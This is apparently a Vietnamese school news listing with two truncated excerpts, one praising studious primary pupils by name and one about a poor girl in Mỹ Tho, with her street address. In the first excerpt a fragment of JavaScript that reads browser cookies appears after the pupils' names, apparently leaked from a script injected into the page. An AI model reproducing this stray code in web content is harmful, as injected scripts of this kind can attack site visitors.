Những gương sáng hiếu học của trường TH Nhân Hải

Những gương sáng hiếu học của trường TH Nhân Hải

Em : Trần Thu Hiền : Lớp 5A Trần Nguyễn Hà Vy: Lớp 5B Nguyễn Khánh Ly : Lớp 5B Nguyễn Kim Chi : Lớp 5B Nguyễn Tiến Lương : Lớp 5C   function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/():void 0}var…
Cô học trò nghèo vượt khó học tốt

Cô học trò nghèo vượt khó học tốt

Vượt qua hoàn cảnh gia đình khó khăn, em Nguyễn Mai Như Ngọc ngụ số 228 đường Ấp Bắc, phường 5, thành phố Mỹ Tho, là học sinh lớp 56 trường tiểu học Thiên Hộ Dương phấn đấu học…